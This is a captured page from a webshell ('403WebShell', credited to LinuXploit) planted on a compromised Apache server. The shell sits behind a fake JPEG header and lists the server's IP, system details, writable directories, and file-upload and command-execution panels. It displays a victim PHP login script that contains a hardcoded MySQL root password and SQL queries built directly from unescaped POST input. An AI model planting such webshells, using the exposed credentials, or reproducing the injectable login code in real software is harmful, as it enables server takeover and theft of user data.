????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/evacuationplans.astacus.se/images/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/evacuationplans.astacus.se/images/scripts/HTTPPOST_getLoginInfo.php
<?php

$username = $_POST['username'];
$password = $_POST['password'];
$password_md5 = md5($password);

$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("notes");
						
$sql = "select * from tblUsers where username = '".$username."' and password = '".$password_md5."'";
				
$result = mysql_query($sql);

if(mysql_num_rows($result) > 0) {
	// User found, we are logged in
	$userdata = mysql_fetch_assoc($result);
$xml ='<?xml version="1.0" encoding="UTF-8"?>
';
$xml .= '	<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
';
$xml .= '	<plist version="1.0">
';
$xml .= '	<dict>
';
$xml .= '		<key>LoginInfo</key>
';
$xml .= '		<dict>
';
$xml .= '			<key>UserID</key>
';
$xml .= '			<string>'.$userdata['userId'].'</string>
';
$xml .= '			<key>CompanyID</key>
';
$xml .= '			<string>'.$userdata['companyId'].'</string>
';
$xml .= '			<key>LoggedIn</key>
';
$xml .= '			<string>true</string>
';
$xml .= '			<key>ReloadSplashScreen</key>
';
$xml .= '			<string>false</string>
';
$xml .= '			<key>SplashScreen</key>
';
$xml .= '			<string></string>
';
$xml .= '			<key>SymbolSets</key>
';
$xml .= '
	</dict>
</dict>
</plist>';	

	$xml ='<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<dict>
		<key>LoginInfo</key>
		<dict>
			<key>UserID</key>
			<string>'.$userdata['userId'].'</string>
			<key>CompanyID</key>
			<string>'.$userdata['companyId'].'</string>
			<key>LoggedIn</key>
			<string>true</string>
			<key>ReloadSplashScreen</key>
			<string>false</string>
			<key>SplashScreen</key>
			<string></string>
		</dict>
	</dict>
	</plist>';

$sql = "update tblUsers set loggedIn = '1', lastLogin = '".date("Y-m-d H:i:s")."' where username = '".$username."' and password = '".$password_md5."'";
mysql_query($sql);
	
}else{
	// User not found, not logged in
	$xml ='<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<dict>
		<key>LoginInfo</key>
		<dict>
			<key>UserID</key>
			<string></string>
			<key>CompanyID</key>
			<string></string>
			<key>LoggedIn</key>
			<string>false</string>
			<key>ReloadSplashScreen</key>
			<string>false</string>
			<key>SplashScreen</key>
			<string></string>
		</dict>
	</dict>
	</plist>';	
}

if($_GET['test'] == "true"){
	echo(iconv($source_encoding,"UTF-8",$xml));
}else{
$source_encoding = "ISO-8859-1";
header("Content-type: application/octet-stream");
header('Content-Disposition: attachment; filename="Login.plist"');
echo(iconv($source_encoding,"UTF-8",$xml));

}



?>

Youez - 2016 - github.com/yon3zu
LinuXploit